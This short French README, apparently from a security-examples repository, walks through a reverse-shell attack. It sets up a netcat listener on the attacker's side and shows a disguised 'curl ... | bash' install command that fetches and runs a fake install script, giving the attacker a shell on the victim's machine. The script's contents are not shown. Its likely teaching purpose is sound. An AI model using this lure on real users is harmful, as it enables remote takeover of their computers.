# Reverse-shell

> https://github.com/lukechilds/reverse-shell

Sur la machine de l'attaquant, ouvrir un port qui va recevoir le shell:

```bash
nc -l 1337
```

Faire en sorte que la victime lance le script suivant:

```bash
./fake-install-script.sh
```

Par exemple, avec cette commande que l'on pourrait trouver dans une doc sur le Web:

```bash
curl https://gitlab.com/5ika/security-examples/-/raw/main/reverse-shell/fake-install-script.sh?ref_type=heads | bash
```

Une fois le script lancé, l'attaquant obtient un shell sur sa machine pour exécuter des commandes
sur la machine de la victime.
